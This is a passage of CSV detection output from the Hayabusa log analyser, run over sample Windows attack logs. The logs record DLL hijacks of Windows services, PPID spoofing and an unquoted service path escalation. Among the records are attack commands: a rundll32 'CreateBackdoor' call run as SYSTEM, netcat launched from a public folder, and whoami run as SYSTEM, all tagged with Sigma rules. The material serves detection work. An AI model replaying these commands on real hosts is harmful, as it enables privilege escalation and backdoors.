Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:17.992 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:17.997 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:18.007 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:18.014 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:18.046 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:25.189 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:25.195 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:25.215 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:25.221 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:25.234 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:25.250 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:25.392 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:25.421 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:25.443 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:25.459 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:25.499 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:25.548 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor : Path: C:\Windows\System32\rundll32.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:39.226 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: nc.exe 127.0.0.1 1337 : Path: C:\Users\Public\Tools\nc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:39.226 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:39.441 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: NT AUTHORITY\SYSTEM : Parent Command: rundll32 windowscoredeviceinfo.dll,CreateBackdoor",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\system32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:45.087 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 14:00:54.689 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 Update Session Orchestrator Dll Hijack.evtx -2020-03-21 21:35:35.026 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : Command: sc stop CDPSvc : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:35:35.026 +09:00,MSEDGEWIN10,1,low,Stop Windows Service,,rules/sigma/process_creation/win_service_stop.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:35:43.104 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: Persistence or Exec - Services Management : Command: sc query CDPSvc : Path: C:\Windows\System32\sc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:35:52.013 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe"" /InvokerPRAID: Microsoft.MicrosoftOfficeHub notifications : Path: C:\Program Files\WindowsApps\Microsoft.MicrosoftOfficeHub_18.2002.1101.0_x64__8wekyb3d8bbwe\LocalBridge.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\System32\RuntimeBroker.exe -Embedding",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: net start CDPSvc : Path: C:\Windows\System32\net.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:35:55.876 +09:00,MSEDGEWIN10,1,low,Service Execution,,rules/sigma/process_creation/win_service_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\net1 start CDPSvc : Path: C:\Windows\System32\net1.exe : User: MSEDGEWIN10\IEUser : Parent Command: net start CDPSvc,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,low,Net.exe Execution,,rules/sigma/process_creation/win_susp_net_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:35:55.897 +09:00,MSEDGEWIN10,1,low,Service Execution,,rules/sigma/process_creation/win_service_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:35:55.919 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: whoami : Path: C:\Windows\System32\whoami.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ""C:\Windows\system32\cmd.exe""",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,high,Run Whoami as SYSTEM,,rules/sigma/process_creation/win_whoami_as_system.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,medium,Whoami Execution,,rules/sigma/process_creation/win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:36:03.901 +09:00,MSEDGEWIN10,1,low,Local Accounts Discovery,,rules/sigma/process_creation/win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:36:06.990 +09:00,MSEDGEWIN10,1,high,Process Creation Sysmon Rule Alert,"Rule: suspicious execution path : Command: nc.exe 127.0.0.1 1337 : Path: C:\Users\Public\Tools\nc.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/alerts/1_ProcessCreationSysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:36:06.990 +09:00,MSEDGEWIN10,1,high,Execution from Suspicious Folder,,rules/sigma/process_creation/win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-21 21:36:24.316 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/Sysmon 7 dllhijack_cdpsshims_CDPSvc.evtx -2020-03-22 06:45:04.922 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""C:\windows\system32\cmd.exe"" : Path: C:\Windows\System32\cmd.exe : User: MSEDGEWIN10\IEUser : Parent Command: C:\Windows\Explorer.EXE",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx -2020-03-22 06:45:16.576 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx -2020-03-22 06:45:16.765 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/sysmon_10_1_ppid_spoofing.evtx -2020-04-26 07:19:00.308 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x4 /state0:0xa38bd055 /state1:0x41c64e6d : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:02.057 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:20.134 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:22.312 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: \??\C:\Windows\system32\autochk.exe * : Path: C:\Windows\System32\autochk.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:22.596 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 000000cc 00000084 : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:22.630 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 000000cc 00000084 ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:23.220 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 000000d8 00000084 : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:23.222 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: wininit.exe : Path: C:\Windows\System32\wininit.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 000000cc 00000084 ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:23.224 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 000000d8 00000084 ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:23.876 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 000000d8 00000084 ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:24.049 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\services.exe : Path: C:\Windows\System32\services.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:24.054 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\lsass.exe : Path: C:\Windows\System32\lsass.exe : User: NT AUTHORITY\SYSTEM : Parent Command: wininit.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:24.188 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s PlugPlay : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:24.194 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:25.198 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x2 /state0:0xa3b08855 /state1:0x41c64e6d : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:25.211 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: ""dwm.exe"" : Path: C:\Windows\System32\dwm.exe : User: Window Manager\DWM-1 : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:25.225 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:25.418 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:25.432 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\SYSTEM : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privesc_unquoted_svc_sysmon_1_11.evtx -2020-04-26 07:19:25.482 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc : Path: 